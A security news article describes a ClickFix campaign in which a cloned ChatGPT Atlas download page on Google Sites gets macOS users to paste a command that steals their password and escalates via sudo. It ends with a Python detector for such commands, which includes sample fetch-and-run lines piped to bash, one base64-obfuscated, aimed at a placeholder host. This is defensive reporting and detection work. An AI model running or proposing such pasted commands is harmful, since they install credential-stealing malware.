Fake ChatGPT Atlas Browser Used in ClickFix Attack to Steal Passwords
Cybersecurity researchers have uncovered a critical ChatGPT Atlas browser attack, confirming the danger of the ongoing surge in the ClickFix threat.
A highly deceptive online threat, called the ClickFix attack, is causing serious concern within the cybersecurity community after recent reports showed a massive 517% surge in its use. Kaushik Devireddy, an AI data scientist at the human risk firm Fable Security, made a specific discovery about the threat and shared it with Hackread.com.
According to Devireddy’s research, hackers are exploiting this technique, which is commonly understood as a simple copy-paste trick, by distributing fake ChatGPT Atlas installers to manipulate people into running password-stealing software on their computers.
**Evolution of the ClickFix Threat**
ClickFix is a form of social engineering in which, instead of a simple email scam, users are tricked by cloned websites that look legitimate.
Hackread.com has persistently covered the evolution of this threat, reporting the tactic’s emergence in May 2024, and by April 2025, it was being used by government-backed hacking groups from countries like Iran (TA450), North Korea (TA427) and Russia (TA422) in their espionage campaigns.
This year, ClickFix attacks targeted everything from popular student platforms like iClicker and remote access tools like AnyDesk to widespread conferencing services like Google Meet and now ChatGPT Atlas.
Fake ChatGPT Atlas download shown in sponsored search (Screenshot: Hackread via Fable Security)
**The Fake Website Trap**
Regarding the latest ClickFix attack, Devireddy personally encountered a fake installer site for the ChatGPT Atlas AI browser. The imitation was so close, with the same layout, design, and text, that the only small hint was the domain address. As Devireddy noted, “The only subtle giveaway was the domain: a Google Sites URL.” The common assumption that Google is highly trustworthy adds a false sense of security, which helps make this attack more successful.
**The Command Line Trap**
In his blog post, Devireddy states that this kind of attack uses a dangerous mix of site cloning, trusted hosting, obfuscated commands, and privilege escalation. The real danger starts when the fake site asks the user to copy a cryptic line of text and paste it into their computer’s command line, like Terminal. This step is crucial because it is “the point where most people, especially curious or rushed users, might comply,” which is exactly what attackers require.
This harmless-looking command secretly runs a remote script that repeatedly asks the user for their password until the correct one is entered. Once stolen, the script uses the password to get elevated privileges or full administrator access (using the sudo command on a macOS system), a process known as privilege escalation. Now the malicious program can move from a standard user account to one with complete control, allowing it to do whatever it wants.
Further probing revealed that this blend of social engineering plus user-granted execution is so effective that it can bypass strong security tools like CrowdStrike and SentinelOne. To avoid becoming a victim, remember that simply searching for something and clicking the wrong link can lead to compromise, so never run command-line instructions given to you by a website.
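As an added illustration (not code from Fable Security's research or the original article), the Python example below shows how a defender could flag the kind of pasted command described above: a remote script fetched and handed straight to a shell, optionally hidden behind base64, with or without sudo. The sample commands, the example.invalid URLs and the finding names are constructed for this example.

```python
import base64
import re

# Heuristics for a command that a web page asks the user to paste into Terminal.
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(\S*/)?(ba|z|da)?sh\b")
SUBST_EXEC = re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\((.*?)\)", re.S)
B64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SUDO = re.compile(r"\bsudo\b")


def findings(cmd, depth=0):
    """Return a sorted list of reasons the pasted command is risky."""
    out = set()
    piped = bool(PIPE_TO_SHELL.search(cmd))
    if FETCH.search(cmd) and (piped or SUBST_EXEC.search(cmd)):
        out.add("remote-script-executed")
    if B64_DECODE.search(cmd) and piped:
        out.add("decoded-blob-executed")
    if SUDO.search(cmd):
        out.add("requests-root")
    # Obfuscation: decode embedded base64 and scan the hidden text as well.
    if depth < 2:
        for blob in B64_BLOB.findall(cmd):
            try:
                hidden = base64.b64decode(blob, validate=True).decode("utf-8")
            except ValueError:  # covers bad base64 and non-UTF-8 payloads
                continue
            inner = findings(hidden, depth + 1)
            if inner:
                out.add("obfuscated")
                out.update(inner)
    return sorted(out)


# Constructed sample input; the URL is a placeholder, not an indicator.
HIDDEN = "curl -fsSL https://example.invalid/atlas.sh | bash"
SAMPLES = {
    "plain": HIDDEN,
    "obfuscated": "echo %s | base64 -d | bash"
    % base64.b64encode(HIDDEN.encode()).decode(),
    "benign": "ls -la ~/Downloads",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, findings(cmd))
```

The same pattern is used by some legitimate installers, so a hit means "this command runs code you have not read", not proof of malware.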